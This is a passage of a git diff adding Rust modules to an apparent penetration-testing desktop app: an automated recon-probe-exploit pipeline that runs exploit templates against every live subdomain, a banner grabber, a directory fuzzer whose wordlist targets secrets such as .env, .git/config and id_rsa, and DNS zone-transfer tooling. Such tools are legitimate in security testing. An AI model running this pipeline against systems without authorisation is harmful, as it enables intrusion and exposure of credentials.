+                    let _ = app.emit("autopwn:status",
+                        format!("skip {} ({}): default/placeholder page", url, status));
+                    return None;
+                }
+
+                let title = title_re.captures(&body)
+                    .and_then(|c| c.get(1))
+                    .map(|m| m.as_str().trim().to_string())
+                    .filter(|s| !s.is_empty());
+                let hit = AutopwnProbeHit { url, status, title, server };
+                let _ = app.emit("autopwn:alive", hit.clone());
+                Some(hit)
+            }
+        })
+        .buffer_unordered(concurrency.max(1))
+        .filter_map(|x| async move { x })
+        .collect()
+        .await;
+
+    alive
+}
+
+// --------------------------------------------------------------
+// stage 3: exploit
+// --------------------------------------------------------------
+
+async fn exploit_alive(
+    app: &AppHandle,
+    alive: &[AutopwnProbeHit],
+    templates_yaml: &[String],
+    concurrency: usize,
+    timeout_ms: u64,
+) -> Vec<Finding> {
+    let templates = parse_templates(templates_yaml, app, "autopwn:status");
+    if templates.is_empty() { return Vec::new(); }
+
+    let client = reqwest::Client::builder()
+        .danger_accept_invalid_certs(true)
+        .timeout(Duration::from_millis(timeout_ms))
+        .redirect(reqwest::redirect::Policy::limited(5))
+        .user_agent("Mozilla/5.0 (PocketPentester-AutoPwn)")
+        .build()
+        .unwrap_or_else(|_| reqwest::Client::new());
+
+    let tasks: Vec<(String, super::xploiter::Template)> = alive.iter()
+        .flat_map(|a| templates.iter().map(move |t| (a.url.clone(), t.clone())))
+        .collect();
+    let total = tasks.len();
+    let _ = app.emit("autopwn:stage", "exploit");
+    let _ = app.emit("autopwn:status", format!("exploiting: {total} target×template combos"));
+
+    let sem = Arc::new(Semaphore::new(concurrency.max(1)));
+    let client = Arc::new(client);
+    let done = Arc::new(std::sync::atomic::AtomicUsize::new(0));
+
+    stream::iter(tasks.into_iter())
+        .map(|(target, tpl)| {
+            let sem = sem.clone();
+            let client = client.clone();
+            let done = done.clone();
+            let app = app.clone();
+            async move {
+                let _p = sem.acquire().await.unwrap();
+                let v = run_template_against_target(&client, &target, &tpl, &app, "autopwn:xpl").await;
+                let n = done.fetch_add(1, std::sync::atomic::Ordering::Relaxed) + 1;
+                let _ = app.emit("autopwn:progress", serde_json::json!({
+                    "stage": "exploit", "done": n, "total": total
+                }));
+                v
+            }
+        })
+        .buffer_unordered(concurrency.max(1))
+        .flat_map(|v| stream::iter(v.into_iter()))
+        .collect()
+        .await
+}
+
+// --------------------------------------------------------------
+// command
+// --------------------------------------------------------------
+
+#[tauri::command]
+pub async fn autopwn_run(app: AppHandle, req: AutopwnRequest) -> Result<AutopwnReport, String> {
+    let ports = req.probe_ports.clone().unwrap_or_else(|| vec![80, 443, 8080, 8443]);
+    let accept_status = req.accept_status.clone().unwrap_or_else(default_accept_statuses);
+
+    // stage 1 ---------------------------------------------------
+    let subs = enum_subdomains(&app, &req.domain, req.use_passive, &req.brute_wordlist, req.concurrency).await;
+    let _ = app.emit("autopwn:stage-done", serde_json::json!({ "stage": "recon", "count": subs.len() }));
+
+    if subs.is_empty() {
+        return Err("no live subdomains resolved".into());
+    }
+
+    // stage 2 ---------------------------------------------------
+    let alive = probe_hosts(&app, &subs, &ports, req.concurrency, req.timeout_ms, &accept_status).await;
+    let _ = app.emit("autopwn:stage-done", serde_json::json!({ "stage": "probe", "count": alive.len() }));
+
+    if alive.is_empty() {
+        let _ = app.emit("autopwn:done", 0);
+        return Ok(AutopwnReport {
+            domain: req.domain,
+            subdomains: subs, alive: vec![], findings: vec![],
+        });
+    }
+
+    // stage 3 ---------------------------------------------------
+    let findings = if req.templates_yaml.is_empty() {
+        let _ = app.emit("autopwn:status", "no templates selected — skipping exploit stage");
+        Vec::new()
+    } else {
+        exploit_alive(&app, &alive, &req.templates_yaml, req.concurrency, req.timeout_ms).await
+    };
+
+    let _ = app.emit("autopwn:stage-done", serde_json::json!({
+        "stage": "exploit", "count": findings.len()
+    }));
+    let _ = app.emit("autopwn:done", findings.len());
+
+    Ok(AutopwnReport {
+        domain: req.domain,
+        subdomains: subs,
+        alive,
+        findings,
+    })
+}
diff --git a/src-tauri/src/modules/banner.rs b/src-tauri/src/modules/banner.rs
new file mode 100644
index 0000000..e539ab7
--- /dev/null
+++ b/src-tauri/src/modules/banner.rs
@@ -0,0 +1,194 @@
+// ===================================================================
+// Banner Grabber — TCP connect + read service greeting, fingerprint
+// common services (SSH / FTP / SMTP / HTTP / Redis / MySQL / IRC).
+// ===================================================================
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use futures::stream::{self, StreamExt};
+use serde::{Deserialize, Serialize};
+use tauri::{AppHandle, Emitter};
+use tokio::io::{AsyncReadExt, AsyncWriteExt};
+use tokio::net::TcpStream;
+use tokio::sync::Semaphore;
+use tokio::time::timeout;
+
+#[derive(Debug, Clone, Deserialize)]
+pub struct BannerRequest {
+    pub host: String,
+    pub ports: Vec<u16>,
+    #[serde(default = "default_conc")]
+    pub concurrency: usize,
+    #[serde(default = "default_timeout")]
+    pub timeout_ms: u64,
+}
+
+fn default_conc() -> usize { 50 }
+fn default_timeout() -> u64 { 4000 }
+
+#[derive(Debug, Clone, Serialize)]
+pub struct BannerHit {
+    pub port: u16,
+    pub banner: String,
+    pub service: String,
+    pub version: Option<String>,
+    pub bytes: usize,
+}
+
+fn fingerprint(port: u16, banner: &str) -> (String, Option<String>) {
+    let lo = banner.to_lowercase();
+    let first_line = banner.lines().next().unwrap_or("").to_string();
+
+    // SSH
+    if banner.starts_with("SSH-") {
+        let ver = first_line.trim().to_string();
+        return ("SSH".into(), Some(ver));
+    }
+
+    // HTTP (we sent a HEAD /)
+    if banner.starts_with("HTTP/") {
+        let server = banner.lines()
+            .find(|l| l.to_lowercase().starts_with("server:"))
+            .map(|l| l.trim_start_matches("Server:").trim_start_matches("server:").trim().to_string());
+        return ("HTTP".into(), server);
+    }
+
+    // FTP
+    if banner.starts_with("220 ") && (lo.contains("ftp") || port == 21) {
+        let ver = first_line.trim_start_matches("220 ").trim().to_string();
+        return ("FTP".into(), Some(ver));
+    }
+
+    // SMTP
+    if banner.starts_with("220 ") && (lo.contains("smtp") || lo.contains("mail") || port == 25 || port == 587) {
+        return ("SMTP".into(), Some(first_line));
+    }
+
+    // POP3 / IMAP
+    if banner.starts_with("+OK") { return ("POP3".into(), Some(first_line)); }
+    if banner.starts_with("* OK") { return ("IMAP".into(), Some(first_line)); }
+
+    // Telnet
+    if banner.as_bytes().first() == Some(&0xFF) { return ("Telnet".into(), None); }
+
+    // Redis
+    if banner.starts_with("+PONG") || banner.starts_with("-NOAUTH") { return ("Redis".into(), None); }
+    if banner.starts_with("-ERR") && port == 6379 { return ("Redis".into(), Some(first_line)); }
+
+    // MySQL (handshake starts with packet length + protocol 0x0a)
+    if banner.as_bytes().len() >= 5 && banner.as_bytes()[4] == 0x0a && port == 3306 {
+        let ver_start = 5;
+        let ver_end = banner.as_bytes().iter().skip(ver_start).position(|&b| b == 0)
+            .map(|p| ver_start + p).unwrap_or(banner.len());
+        if ver_end > ver_start {
+            return ("MySQL".into(), Some(String::from_utf8_lossy(&banner.as_bytes()[ver_start..ver_end]).to_string()));
+        }
+        return ("MySQL".into(), None);
+    }
+
+    // PostgreSQL — responds with error on junk; check for "FATAL" or specific msg
+    if port == 5432 && (lo.contains("fatal") || lo.contains("postgresql")) {
+        return ("PostgreSQL".into(), None);
+    }
+
+    // RDP — first byte 0x03 (TPKT)
+    if banner.as_bytes().first() == Some(&0x03) && port == 3389 {
+        return ("RDP".into(), None);
+    }
+
+    // VNC
+    if banner.starts_with("RFB ") { return ("VNC".into(), Some(first_line.trim().into())); }
+
+    // IRC
+    if banner.starts_with(":") && lo.contains("irc") { return ("IRC".into(), Some(first_line)); }
+
+    // MongoDB — ismaster reply; harder
+    if port == 27017 { return ("MongoDB".into(), None); }
+
+    // Fallback by port
+    let by_port = match port {
+        53 => "DNS", 22 => "SSH?", 23 => "Telnet?", 25 => "SMTP?",
+        80 | 8080 | 8000 | 8088 => "HTTP?", 110 => "POP3?", 143 => "IMAP?",
+        443 | 8443 => "HTTPS?", 445 => "SMB", 465 => "SMTPS",
+        587 => "SMTP-SUB", 993 => "IMAPS", 995 => "POP3S",
+        1433 => "MSSQL", 1521 => "Oracle", 2049 => "NFS",
+        3306 => "MySQL", 3389 => "RDP", 5432 => "PostgreSQL",
+        5900 => "VNC", 6379 => "Redis", 6667 => "IRC",
+        9200 => "Elasticsearch",
+        11211 => "Memcached", 27017 => "MongoDB",
+        _ => "unknown",
+    };
+    (by_port.to_string(), None)
+}
+
+async fn grab(host: &str, port: u16, timeout_ms: u64) -> Option<BannerHit> {
+    let addr = format!("{host}:{port}");
+    let stream = timeout(Duration::from_millis(timeout_ms), TcpStream::connect(&addr)).await.ok()?.ok()?;
+    let _ = stream.set_nodelay(true);
+    let mut stream = stream;
+
+    // For HTTP-ish ports, send a HEAD request to elicit a Server header
+    let triggers: &[&[u8]] = match port {
+        80 | 8080 | 8000 | 8008 | 8088 | 8888 | 9000 | 9090 | 10000 =>
+            &[b"HEAD / HTTP/1.0\r\n\r\n"],
+        21 | 22 | 25 | 110 | 143 | 220 | 5432 | 6379 => &[],
+        _ => &[],
+    };
+    for t in triggers {
+        let _ = timeout(Duration::from_millis(500), stream.write_all(t)).await;
+    }
+
+    let mut buf = [0u8; 2048];
+    let read = timeout(Duration::from_millis(timeout_ms), stream.read(&mut buf)).await.ok()?.ok()?;
+    if read == 0 { return None; }
+
+    let banner_raw = String::from_utf8_lossy(&buf[..read]).to_string();
+    let banner = banner_raw.trim_end_matches(['\r', '\n', '\0']).to_string();
+    let (service, version) = fingerprint(port, &banner);
+
+    // If banner is empty but we got bytes (binary), keep as-is
+    let display = if banner.is_empty() && read > 0 {
+        format!("[binary {} bytes]", read)
+    } else {
+        // strip non-printable for display
+        banner.chars().map(|c| if c.is_ascii_graphic() || c == ' ' || c == '\n' { c } else { '.' }).collect::<String>()
+    };
+
+    Some(BannerHit { port, banner: display, service, version, bytes: read })
+}
+
+#[tauri::command]
+pub async fn banner_grab(app: AppHandle, req: BannerRequest) -> Result<Vec<BannerHit>, String> {
+    let total = req.ports.len();
+    let _ = app.emit("banner:status", format!("grabbing banners on {} port(s)", total));
+
+    let sem = Arc::new(Semaphore::new(req.concurrency.max(1)));
+    let done = Arc::new(std::sync::atomic::AtomicUsize::new(0));
+    let host = Arc::new(req.host.clone());
+
+    let hits: Vec<BannerHit> = stream::iter(req.ports.into_iter())
+        .map(|port| {
+            let sem = sem.clone();
+            let done = done.clone();
+            let app = app.clone();
+            let host = host.clone();
+            async move {
+                let _permit = sem.acquire().await.unwrap();
+                let res = grab(&host, port, req.timeout_ms).await;
+                let n = done.fetch_add(1, std::sync::atomic::Ordering::Relaxed) + 1;
+                let _ = app.emit("banner:progress", serde_json::json!({"done": n, "total": total}));
+                if let Some(ref h) = res {
+                    let _ = app.emit("banner:hit", h.clone());
+                }
+                res
+            }
+        })
+        .buffer_unordered(req.concurrency.max(1))
+        .filter_map(|x| async move { x })
+        .collect()
+        .await;
+
+    let _ = app.emit("banner:done", hits.len());
+    Ok(hits)
+}
diff --git a/src-tauri/src/modules/dirfuzz.rs b/src-tauri/src/modules/dirfuzz.rs
new file mode 100644
index 0000000..b603686
--- /dev/null
+++ b/src-tauri/src/modules/dirfuzz.rs
@@ -0,0 +1,283 @@
+// ===================================================================
+// Directory Fuzzer — feroxbuster-style content discovery.
+// Streams hits via events. Supports extensions, recursion, filters.
+// ===================================================================
+
+use std::collections::HashMap;
+use std::sync::Arc;
+use std::time::Duration;
+
+use futures::stream::{self, StreamExt};
+use serde::{Deserialize, Serialize};
+use tauri::{AppHandle, Emitter};
+use tokio::sync::{Mutex, Semaphore};
+
+#[derive(Debug, Clone, Deserialize)]
+pub struct DirFuzzRequest {
+    pub base_url: String,
+    pub wordlist: Vec<String>,
+    #[serde(default)]
+    pub extensions: Vec<String>,
+    #[serde(default)]
+    pub accept_status: Option<Vec<u16>>,
+    #[serde(default)]
+    pub size_min: Option<u64>,
+    #[serde(default)]
+    pub size_max: Option<u64>,
+    pub concurrency: usize,
+    pub timeout_ms: u64,
+    #[serde(default)]
+    pub follow_redirects: bool,
+    #[serde(default)]
+    pub recursive: bool,
+    #[serde(default = "default_depth")]
+    pub recursion_depth: u8,
+    #[serde(default)]
+    pub headers: HashMap<String, String>,
+    #[serde(default)]
+    pub user_agent: Option<String>,
+}
+
+fn default_depth() -> u8 { 2 }
+
+#[derive(Debug, Clone, Serialize)]
+pub struct DirHit {
+    pub url: String,
+    pub status: u16,
+    pub size: u64,
+    pub words: usize,
+    pub lines: usize,
+    pub redirect: Option<String>,
+    pub title: Option<String>,
+    pub content_type: Option<String>,
+    pub time_ms: u128,
+}
+
+fn default_statuses() -> Vec<u16> {
+    vec![200, 201, 204, 301, 302, 307, 308, 401, 403, 405]
+}
+
+fn build_client(req: &DirFuzzRequest) -> reqwest::Client {
+    let ua = req.user_agent.clone()
+        .unwrap_or_else(|| "Mozilla/5.0 (PocketPentester-DirFuzz)".into());
+    reqwest::Client::builder()
+        .danger_accept_invalid_certs(true)
+        .timeout(Duration::from_millis(req.timeout_ms))
+        .redirect(if req.follow_redirects {
+            reqwest::redirect::Policy::limited(5)
+        } else {
+            reqwest::redirect::Policy::none()
+        })
+        .user_agent(ua)
+        .build()
+        .unwrap_or_else(|_| reqwest::Client::new())
+}
+
+fn expand_paths(word: &str, extensions: &[String]) -> Vec<String> {
+    let w = word.trim().trim_start_matches('/');
+    if w.is_empty() { return vec![]; }
+    let mut out = vec![w.to_string()];
+    for ext in extensions {
+        let e = ext.trim();
+        if e.is_empty() { continue; }
+        let normalized = if e.starts_with('.') { e.to_string() } else { format!(".{e}") };
+        out.push(format!("{w}{normalized}"));
+    }
+    out
+}
+
+fn parse_title(body: &str) -> Option<String> {
+    let lower = body.to_lowercase();
+    let start = lower.find("<title")?;
+    let rest = &body[start..];
+    let body_start = rest.find('>')? + 1;
+    let end = lower[start..].find("</title>")?;
+    let title = &rest[body_start..end];
+    let t = title.trim();
+    if t.is_empty() { None } else { Some(t.chars().take(100).collect()) }
+}
+
+async fn probe(
+    client: &reqwest::Client,
+    url: &str,
+    headers: &HashMap<String, String>,
+) -> Option<DirHit> {
+    let start = std::time::Instant::now();
+    let mut builder = client.get(url);
+    for (k, v) in headers {
+        if k.trim().is_empty() { continue; }
+        builder = builder.header(k.trim(), v);
+    }
+    let resp = builder.send().await.ok()?;
+    let status = resp.status().as_u16();
+    let content_type = resp.headers().get("content-type")
+        .and_then(|v| v.to_str().ok()).map(String::from);
+    let redirect = resp.headers().get("location")
+        .and_then(|v| v.to_str().ok()).map(String::from);
+    let body = resp.text().await.unwrap_or_default();
+    let time_ms = start.elapsed().as_millis();
+
+    Some(DirHit {
+        url: url.to_string(),
+        status,
+        size: body.len() as u64,
+        words: body.split_whitespace().count(),
+        lines: body.lines().count(),
+        redirect,
+        title: parse_title(&body),
+        content_type,
+        time_ms,
+    })
+}
+
+#[tauri::command]
+pub async fn dirfuzz_run(app: AppHandle, req: DirFuzzRequest) -> Result<Vec<DirHit>, String> {
+    let base = req.base_url.trim_end_matches('/').to_string();
+    let client = Arc::new(build_client(&req));
+    let accept: Vec<u16> = req.accept_status.clone().unwrap_or_else(default_statuses);
+    let accept_set: std::collections::HashSet<u16> = accept.iter().copied().collect();
+
+    // ---- baseline calibration: fetch a random non-existent path to detect wildcard 200s ----
+    let wildcard_marker = format!("__xploit_wildcard_{}_{}", rand::random::<u32>(), rand::random::<u32>());
+    let wildcard_url = format!("{}/{}", base, wildcard_marker);
+    let wildcard_size: Option<u64> = probe(&client, &wildcard_url, &req.headers).await
+        .filter(|h| accept_set.contains(&h.status))
+        .map(|h| h.size);
+    if let Some(sz) = wildcard_size {
+        let _ = app.emit("dirfuzz:status",
+            format!("wildcard calibration: {} returned status (size={}) — same-size responses will be filtered", wildcard_url, sz));
+    }
+
+    // ---- build initial path list ----
+    let mut initial_paths: Vec<String> = Vec::new();
+    for w in &req.wordlist {
+        for p in expand_paths(w, &req.extensions) {
+            initial_paths.push(p);
+        }
+    }
+
+    let queue: Arc<Mutex<Vec<(String, u8)>>> = Arc::new(Mutex::new(vec![(base.clone(), 0)]));
+    let all_hits: Arc<Mutex<Vec<DirHit>>> = Arc::new(Mutex::new(Vec::new()));
+    let total_done = Arc::new(std::sync::atomic::AtomicUsize::new(0));
+
+    loop {
+        let (current_base, depth) = {
+            let mut q = queue.lock().await;
+            if q.is_empty() { break; }
+            q.remove(0)
+        };
+
+        let urls: Vec<String> = initial_paths.iter()
+            .map(|p| format!("{}/{}", current_base.trim_end_matches('/'), p))
+            .collect();
+        let total = urls.len();
+
+        let _ = app.emit("dirfuzz:status",
+            format!("fuzzing {} (depth {}): {} paths", current_base, depth, total));
+
+        let sem = Arc::new(Semaphore::new(req.concurrency.max(1)));
+        let local_hits: Arc<Mutex<Vec<DirHit>>> = Arc::new(Mutex::new(Vec::new()));
+
+        stream::iter(urls.into_iter())
+            .map(|url| {
+                let client = client.clone();
+                let sem = sem.clone();
+                let headers = req.headers.clone();
+                let accept_set = accept_set.clone();
+                let size_min = req.size_min;
+                let size_max = req.size_max;
+                let wildcard_size = wildcard_size;
+                let total_done = total_done.clone();
+                let local_hits = local_hits.clone();
+                let all_hits_c = all_hits.clone();
+                let app = app.clone();
+                async move {
+                    let _permit = sem.acquire().await.unwrap();
+                    if let Some(hit) = probe(&client, &url, &headers).await {
+                        let n = total_done.fetch_add(1, std::sync::atomic::Ordering::Relaxed) + 1;
+                        let _ = app.emit("dirfuzz:progress",
+                            serde_json::json!({"done": n, "total_seen": total_done.load(std::sync::atomic::Ordering::Relaxed)}));
+
+                        if !accept_set.contains(&hit.status) { return; }
+                        if let Some(min) = size_min { if hit.size < min { return; } }
+                        if let Some(max) = size_max { if hit.size > max { return; } }
+                        if let Some(wsz) = wildcard_size { if hit.size == wsz { return; } }
+
+                        let _ = app.emit("dirfuzz:hit", hit.clone());
+                        local_hits.lock().await.push(hit.clone());
+                        all_hits_c.lock().await.push(hit);
+                    } else {
+                        total_done.fetch_add(1, std::sync::atomic::Ordering::Relaxed);
+                    }
+                }
+            })
+            .buffer_unordered(req.concurrency.max(1))
+            .for_each(|_| async {})
+            .await;
+
+        // recursion: enqueue hits that look like directories
+        if req.recursive && depth < req.recursion_depth {
+            let hits = local_hits.lock().await;
+            for h in hits.iter() {
+                let looks_like_dir = h.status == 301 || h.status == 302
+                    || h.url.ends_with('/')
+                    || h.redirect.as_deref().map(|r| r.ends_with('/')).unwrap_or(false);
+                if looks_like_dir {
+                    let mut q = queue.lock().await;
+                    q.push((h.url.trim_end_matches('/').to_string(), depth + 1));
+                }
+            }
+        }
+    }
+
+    let hits = all_hits.lock().await.clone();
+    let _ = app.emit("dirfuzz:done", hits.len());
+    Ok(hits)
+}
+
+#[tauri::command]
+pub fn dirfuzz_common_wordlist() -> Vec<String> {
+    // compact default wordlist — 150 of the highest-signal paths
+    vec![
+        "admin", "administrator", "login", "signin", "signup", "register",
+        "dashboard", "api", "api/v1", "api/v2", "api/v3", "graphql",
+        "robots.txt", "sitemap.xml", "crossdomain.xml", "clientaccesspolicy.xml",
+        ".git/config", ".git/HEAD", ".git/logs/HEAD", ".svn/entries", ".hg/hgrc",
+        ".env", ".env.local", ".env.production", ".env.backup",
+        "config", "config.php", "config.json", "config.yml", "config.xml",
+        "backup", "backup.zip", "backup.tar.gz", "backup.sql", "backup.bak",
+        "db.sql", "dump.sql", "database.sql", "site.sql",
+        "test", "test.php", "test.html", "phpinfo.php", "info.php",
+        "server-status", "server-info", "status",
+        "wp-admin", "wp-login.php", "wp-content", "wp-includes", "wp-config.php",
+        "administrator/index.php", "user/login", "users/sign_in",
+        "phpmyadmin", "myadmin", "mysql", "dbadmin", "adminer", "adminer.php",
+        ".htaccess", ".htpasswd", ".DS_Store", "thumbs.db",
+        "uploads", "upload", "files", "file", "download", "downloads",
+        "images", "img", "assets", "static", "public", "private",
+        "docs", "doc", "documentation", "swagger", "swagger.json",
+        "swagger-ui.html", "api-docs", "openapi.json", "openapi.yaml",
+        "console", "actuator", "actuator/health", "actuator/env", "actuator/info",
+        "metrics", "prometheus", "health", "healthcheck", "readiness", "liveness",
+        "debug", "trace", "error", "errors", "log", "logs", "error_log",
+        "jenkins", "phpunit", "webdav", "manager/html", "tomcat",
+        "portal", "support", "help", "about", "contact", "feedback",
+        "mail", "email", "webmail", "smtp", "imap",
+        "vpn", "sso", "auth", "oauth", "oauth2", "openid",
+        ".well-known/security.txt", ".well-known/openid-configuration",
+        ".well-known/acme-challenge", ".well-known/nodeinfo",
+        "index.php", "index.html", "index.asp", "index.aspx", "index.jsp",
+        "home", "main", "default",
+        "secret", "private.key", "id_rsa", "id_dsa",
+        "setup", "install", "installer", "setup.php",
+        "cgi-bin", "cgi-bin/test.sh", "cgi-bin/info.sh",
+        "dev", "development", "staging", "stage", "beta", "qa", "uat",
+        "old", "new", "tmp", "temp", "cache",
+        "api/users", "api/user", "api/me", "api/login", "api/admin",
+        "admin/login", "admin/config", "admin/users",
+        "fckeditor", "ckeditor", "tinymce", "editor",
+        "vendor", "node_modules", "composer.json", "composer.lock",
+        "package.json", "yarn.lock", "webpack.config.js",
+        "wp-json", "wp-json/wp/v2", "wp-json/wp/v2/users",
+    ].into_iter().map(String::from).collect()
+}
diff --git a/src-tauri/src/modules/dns_tools.rs b/src-tauri/src/modules/dns_tools.rs
new file mode 100644
index 0000000..3853fc0
--- /dev/null
+++ b/src-tauri/src/modules/dns_tools.rs
@@ -0,0 +1,263 @@
+// ===================================================================
+// DNS Tools — comprehensive record lookup + zone transfer + DNSSEC
+// ===================================================================
+
+use std::net::SocketAddr;
+use std::time::Duration;
+
+use hickory_resolver::config::{NameServerConfig, Protocol, ResolverConfig, ResolverOpts};
+use hickory_resolver::proto::rr::RecordType;
+use hickory_resolver::TokioAsyncResolver;
+use serde::{Deserialize, Serialize};
+use tokio::net::TcpStream;
+use tokio::time::timeout;
+
+#[derive(Debug, Clone, Deserialize)]
+pub struct DnsRequest {
+    pub domain: String,
+    #[serde(default)]
+    pub resolver: Option<String>, // e.g. "1.1.1.1:53", "8.8.8.8:53", "internal-dns.corp:53"
+    #[serde(default)]
+    pub types: Option<Vec<String>>, // subset to query, None = all
+    #[serde(default)]
+    pub try_axfr: bool,
+}
+
+#[derive(Debug, Clone, Serialize)]
+pub struct DnsReport {
+    pub domain: String,
+    pub records: Vec<DnsRecordGroup>,
+    pub axfr: Option<AxfrResult>,
+    pub dnssec: DnssecCheck,
+    pub errors: Vec<String>,
+}
+
+#[derive(Debug, Clone, Serialize)]
+pub struct DnsRecordGroup {
+    pub rtype: String,
+    pub values: Vec<String>,
+}
+
+#[derive(Debug, Clone, Serialize)]
+pub struct AxfrResult {
+    pub success: bool,
+    pub nameserver: String,
+    pub records_dumped: Vec<String>,
+    pub error: Option<String>,
+}
+
+#[derive(Debug, Clone, Serialize)]
+pub struct DnssecCheck {
+    pub dnskey_count: usize,
+    pub has_dnssec: bool,
+}
+
+fn build_resolver(custom: Option<&str>) -> Result<TokioAsyncResolver, String> {
+    let mut opts = ResolverOpts::default();
+    opts.timeout = Duration::from_secs(4);
+    opts.attempts = 2;
+
+    if let Some(addr) = custom {
+        let sa: SocketAddr = if addr.contains(':') {
+            addr.parse().map_err(|e| format!("bad resolver addr: {e}"))?
+        } else {
+            format!("{addr}:53").parse().map_err(|e| format!("bad resolver addr: {e}"))?
+        };
+        let mut cfg = ResolverConfig::new();
+        cfg.add_name_server(NameServerConfig {
+            socket_addr: sa,
+            protocol: Protocol::Udp,
+            tls_dns_name: None,
+            trust_negative_responses: false,
+            bind_addr: None,
+        });
+        Ok(TokioAsyncResolver::tokio(cfg, opts))
+    } else {
+        Ok(TokioAsyncResolver::tokio(ResolverConfig::cloudflare(), opts))
+    }
+}
+
+fn all_types() -> Vec<(&'static str, RecordType)> {
+    vec![
+        ("A", RecordType::A),
+        ("AAAA", RecordType::AAAA),
+        ("MX", RecordType::MX),
+        ("NS", RecordType::NS),
+        ("CNAME", RecordType::CNAME),
+        ("TXT", RecordType::TXT),
+        ("SOA", RecordType::SOA),
+        ("CAA", RecordType::CAA),
+        ("SRV", RecordType::SRV),
+        ("PTR", RecordType::PTR),
+    ]
+}
+
+async fn try_axfr(domain: &str, nameserver: &str) -> AxfrResult {
+    // Best-effort AXFR via raw TCP to port 53.
+    // Build a minimal DNS AXFR query (type 252) and read packets.
+    // Most public servers will refuse (REFUSED rcode) — this is mostly a
+    // "is this server misconfigured" check.
+    let addr: SocketAddr = match format!("{nameserver}:53").parse() {
+        Ok(a) => a,
+        Err(e) => return AxfrResult { success: false, nameserver: nameserver.into(), records_dumped: vec![], error: Some(e.to_string()) },
+    };
+
+    let stream_res = timeout(Duration::from_secs(5), TcpStream::connect(addr)).await;
+    let mut stream = match stream_res {
+        Ok(Ok(s)) => s,
+        Ok(Err(e)) => return AxfrResult { success: false, nameserver: nameserver.into(), records_dumped: vec![], error: Some(e.to_string()) },
+        Err(_) => return AxfrResult { success: false, nameserver: nameserver.into(), records_dumped: vec![], error: Some("connect timeout".into()) },
+    };
+
+    let mut query: Vec<u8> = Vec::new();
+    // DNS header (12 bytes): tx=0, flags=0x0100 (RD), questions=1
+    query.extend_from_slice(&[0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0]);
+    // QNAME
+    for label in domain.trim_end_matches('.').split('.') {
+        let bytes = label.as_bytes();
+        query.push(bytes.len() as u8);
+        query.extend_from_slice(bytes);
+    }
+    query.push(0);
+    // QTYPE=252 AXFR, QCLASS=IN
+    query.extend_from_slice(&[0, 252, 0, 1]);
+
+    // TCP DNS prepends 2-byte length
+    let mut framed = Vec::with_capacity(query.len() + 2);
+    let len = query.len() as u16;
+    framed.extend_from_slice(&len.to_be_bytes());
+    framed.extend_from_slice(&query);
+
+    use tokio::io::{AsyncReadExt, AsyncWriteExt};
+    if let Err(e) = stream.write_all(&framed).await {
+        return AxfrResult { success: false, nameserver: nameserver.into(), records_dumped: vec![], error: Some(e.to_string()) };
+    }
+    let _ = stream.flush().await;
+
+    // Read up to 32KB of responses, parse roughly — just count record names.
+    let mut out: Vec<String> = Vec::new();
+    let mut total = 0usize;
+    loop {
+        let mut len_buf = [0u8; 2];
+        let r = timeout(Duration::from_secs(4), stream.read_exact(&mut len_buf)).await;
+        match r {
+            Ok(Ok(_)) => {}
+            _ => break,
+        }
+        let rlen = u16::from_be_bytes(len_buf) as usize;
+        if rlen == 0 || rlen > 65535 { break; }
+        let mut buf = vec![0u8; rlen];
+        if timeout(Duration::from_secs(4), stream.read_exact(&mut buf)).await.is_err() { break; }
+        total += buf.len();
+        // check RCODE in response flags
+        if buf.len() >= 4 {
+            let rcode = buf[3] & 0x0F;
+            if rcode != 0 {
+                return AxfrResult {
+                    success: false,
+                    nameserver: nameserver.into(),
+                    records_dumped: vec![],
+                    error: Some(format!("RCODE {rcode} (refused/notauth/other)")),
+                };
+            }
+        }
+        // naive: parse names from answer section (skip header + question)
+        if let Some(names) = extract_names(&buf) {
+            for n in names {
+                if !out.contains(&n) { out.push(n); }
+            }
+        }
+        if total > 65536 { break; }
+    }
+
+    AxfrResult {
+        success: !out.is_empty(),
+        nameserver: nameserver.into(),
+        records_dumped: out,
+        error: None,
+    }
+}
+
+// Best-effort name extractor — walks bytes looking for printable labels.
+fn extract_names(packet: &[u8]) -> Option<Vec<String>> {
+    if packet.len() < 12 { return None; }
+    let mut out: Vec<String> = Vec::new();
+    let mut i = 12; // skip header
+    let mut seen = std::collections::HashSet::new();
+    while i < packet.len() {
+        let len = packet[i] as usize;
+        if len == 0 { i += 1; continue; }
+        if len & 0xC0 == 0xC0 { i += 2; continue; }
+        if i + 1 + len > packet.len() { break; }
+        if len < 64 {
+            let bytes = &packet[i + 1..i + 1 + len];
+            if bytes.iter().all(|b| b.is_ascii_graphic()) {
+                let s = String::from_utf8_lossy(bytes).to_string();
+                if !seen.contains(&s) && s.len() > 1 {
+                    seen.insert(s.clone());
+                    out.push(s);
+                }
+            }
+        }
+        i += 1 + len;
+    }
+    Some(out)
+}
+
+#[tauri::command]
+pub async fn dns_query(req: DnsRequest) -> Result<DnsReport, String> {
+    let resolver = build_resolver(req.resolver.as_deref())?;
+    let wanted: Vec<(&'static str, RecordType)> = match &req.types {
+        Some(v) if !v.is_empty() => all_types().into_iter().filter(|(n, _)| v.iter().any(|x| x.eq_ignore_ascii_case(n))).collect(),
+        _ => all_types(),
+    };
+
+    let mut records: Vec<DnsRecordGroup> = Vec::new();
+    let mut errors: Vec<String> = Vec::new();
+    let mut nameservers: Vec<String> = Vec::new();
+
+    for (name, rt) in wanted {
+        let result = resolver.lookup(req.domain.as_str(), rt).await;
+        match result {
+            Ok(lookup) => {
+                let values: Vec<String> = lookup.iter().map(|r| r.to_string()).collect();
+                if !values.is_empty() {
+                    if name == "NS" {
+                        for v in &values { nameservers.push(v.trim_end_matches('.').to_string()); }
+                    }
+                    records.push(DnsRecordGroup { rtype: name.to_string(), values });
+                }
+            }
+            Err(e) => {
+                let msg = format!("{name}: {e}");
+                // "no records found" is noise — only log if not NoRecordsFound
+                if !msg.to_lowercase().contains("no record") {
+                    errors.push(msg);
+                }
+            }
+        }
+    }
+
+    // DNSSEC check — presence of DNSKEY
+    let dnssec = match resolver.lookup(req.domain.as_str(), RecordType::DNSKEY).await {
+        Ok(lookup) => {
+            let count = lookup.iter().count();
+            DnssecCheck { dnskey_count: count, has_dnssec: count > 0 }
+        }
+        Err(_) => DnssecCheck { dnskey_count: 0, has_dnssec: false },
+    };
+
+    // AXFR attempt
+    let axfr = if req.try_axfr {
+        let ns = nameservers.first().cloned().unwrap_or_default();
+        if ns.is_empty() {
